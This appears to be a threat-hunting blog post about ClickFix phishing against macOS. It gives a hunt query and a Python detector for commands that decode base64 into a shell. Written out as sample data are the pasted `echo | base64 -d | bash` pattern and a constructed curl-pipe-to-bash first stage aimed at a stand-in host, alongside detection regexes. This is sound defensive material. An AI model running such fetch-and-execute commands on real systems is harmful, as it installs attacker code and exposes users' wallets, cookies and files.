208. Hunting for ClickFix on macOS

Hello everyone!

Do you think the ClickFix technique is used only against Windows systems? It isn't. Adversaries use it to attack macOS as well!

Hunt.io shared a report on a recent phishing campaign targeting macOS users. The adversary leveraged a fake CAPTCHA page to trick victims into running commands in Terminal.

According to the report, the pasted command typically starts with:

echo 'BASE64_ENCODED_PAYLOAD' | base64 -d | bash

So, we can use it to build a query for our hunting mission:

event_type: "processcreatemac"

AND

cmdline: ("echo" AND "base64" AND "bash")

The command runs a hidden script that can steal crypto wallets, cookies, and sensitive files.
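To see how the query behaves against real process telemetry, here is an added example (my own code, not from the Hunt.io report or the original post) that runs two matchers over a handful of constructed macOS process-creation events: a keyword check that approximates the hunt query above, and a tighter regex that only fires when echo output is piped into a base64 decode and then straight into a shell. It also decodes the echoed payload so an analyst can read the first stage during triage. The event shape, the sample command lines and the first-stage script are all constructed for this example; the -D and --decode spellings of the decode flag and the sh/zsh shells are variants I assume an operator might swap in, not something the report states.

```python
import base64
import binascii
import re
from typing import Callable, Dict, List, Optional

# First-stage command constructed for this example (not taken from the report).
FIRST_STAGE = "curl -fsSL http://example.invalid/stage2.sh | bash"
B64 = base64.b64encode(FIRST_STAGE.encode()).decode()

# Constructed process-creation events in the shape the hunt query expects.
# None of these come from real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # 1. The ClickFix shape from the post: echo '...' | base64 -d | bash
    {"event_type": "processcreatemac",
     "cmdline": f"/bin/bash -c \"echo '{B64}' | base64 -d | bash\""},
    # 2. Assumed variant: -D decode flag, zsh wrapper, sh as the final shell
    {"event_type": "processcreatemac",
     "cmdline": f"/bin/zsh -c \"echo '{B64}' | base64 -D | sh\""},
    # 3. All three keywords present, but nothing decoded is executed
    {"event_type": "processcreatemac",
     "cmdline": "/bin/bash -c \"echo done; base64 -d /tmp/cert.b64 > /tmp/cert.pem\""},
    # 4. Encoding, not decoding; no shell on the right of the pipe
    {"event_type": "processcreatemac",
     "cmdline": "/bin/sh -c \"echo hello | base64\""},
    # 5. Right command line, wrong platform: excluded by event_type
    {"event_type": "processcreatewin",
     "cmdline": f"cmd.exe /c echo {B64} | base64 -d | bash"},
]

# Keywords from the hunt query in the post
KEYWORDS = ("echo", "base64", "bash")

# echo <no pipe> | base64 <decode flag> <no pipe> | <shell>
PIPELINE_RE = re.compile(
    r"\becho\b[^|]*\|\s*base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:bash|sh|zsh)\b"
)

# The argument handed to echo, with or without surrounding quotes
ECHO_ARG_RE = re.compile(r"\becho\s+['\"]?([A-Za-z0-9+/=]+)")


def is_mac_proc(event: Dict[str, str]) -> bool:
    """Equivalent of the event_type filter in the query."""
    return event.get("event_type") == "processcreatemac"


def keyword_hit(event: Dict[str, str]) -> bool:
    """Approximation of the free-text query: all three keywords present."""
    cmd = event.get("cmdline", "").lower()
    return is_mac_proc(event) and all(k in cmd for k in KEYWORDS)


def pipeline_hit(event: Dict[str, str]) -> bool:
    """Tighter check: decoded base64 is piped straight into a shell."""
    return is_mac_proc(event) and PIPELINE_RE.search(event.get("cmdline", "")) is not None


def decode_stage(cmdline: str) -> Optional[str]:
    """Recover the echoed first stage for triage; None if it is not valid base64."""
    m = ECHO_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def hunt(events: List[Dict[str, str]],
         matcher: Callable[[Dict[str, str]], bool]) -> List[str]:
    """Return the command lines of every event the matcher flags."""
    return [e["cmdline"] for e in events if matcher(e)]


if __name__ == "__main__":
    for name, matcher in (("keyword", keyword_hit), ("pipeline", pipeline_hit)):
        print(f"== {name} matches ==")
        for cmd in hunt(SAMPLE_EVENTS, matcher):
            print(cmd)
            print("  first stage:", decode_stage(cmd))
```

On these samples the keyword matcher flags events 1 and 3 (event 3 is a false positive: a script that decodes a file and never runs it), while it misses event 2 because the attacker swapped bash for zsh and sh. The pipeline matcher flags events 1 and 2 and ignores 3 and 4. The practical takeaway is to run the broad keyword query first for coverage, then pivot on the decode-to-shell shape and decode the echoed blob to confirm what the first stage actually does.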

See you tomorrow!
